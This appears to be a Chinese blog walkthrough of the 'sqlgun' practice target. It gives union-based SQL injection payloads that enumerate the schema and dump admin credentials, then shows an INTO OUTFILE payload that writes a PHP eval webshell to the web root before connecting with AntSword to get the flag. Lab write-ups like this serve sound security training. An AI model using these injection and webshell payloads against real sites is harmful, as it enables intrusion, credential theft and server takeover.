当前位置: 首页 > article >正文

sqlgun靶场攻略

article 2024/11/15 11:41:32

步骤一:打开页面

步骤二:测试回显点

-1'union select 1,2,3#

步骤三:查看数据库名

-1'union select 1,2,database()#

步骤四:查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

步骤五:查看列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

步骤六:查看账户和密码

-1'union select 1,2,group_concat(id,admin,password) from admin#

md5解密

步骤七:扫描目录,有一个phpinfo.php文件,访问获取绝对路径

步骤八:.写入一句话木马,访问a.php

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/a

lsz.php' #

步骤九:进行蚁剑连接

根目录下flag


http://www.kler.cn/a/307351.html

相关文章:

  • 操作系统lab4-页面置换算法的模拟
  • LabVIEW大数据处理
  • docker构建jdk11
  • ArkTs简单入门案例:简单的图片切换应用界面
  • 【JVM】关于JVM的内部原理你到底了解多少(八股文面经知识点)
  • ubuntu20.04安装FLIR灰点相机BFS-PGE-16S2C-CS的ROS驱动
  • Mysql系列-索引简介
  • Vert.x HttpClient调用后端服务时使用Idle Timeout和KeepAlive Timeout的行为分析
  • 11.java面向对象
  • macOS上谷歌浏览器的十大隐藏功能
  • c语言中的常量定义(补充)
  • 【兼容性记录】video标签在 IOS 和 安卓中的问题
  • 队列-------
  • 英语学习交流平台|基于java的英语学习交流平台系统小程序(源码+数据库+文档)
  • EP12 分类列表元素点击跳转
  • 【云原生监控】Prometheus之PushGateway
  • 机器学习的入门指南
  • JVM HotSpot 虚拟机: 对象的创建, 内存布局和访问定位
  • Oracle数据库中的归档日志(Archive Log)详解与应用
  • 07_Python数据类型_集合
  • 系统 IO
  • 08_Python数据类型_字典
  • C# 记录一个获取系统空闲时间的函数,可用于判断休眠
  • 性能测试:Locust使用介绍(三)
  • MoCo对比损失
  • LC并联电路在正弦稳态下的传递函数推导(LC并联谐振选频电路)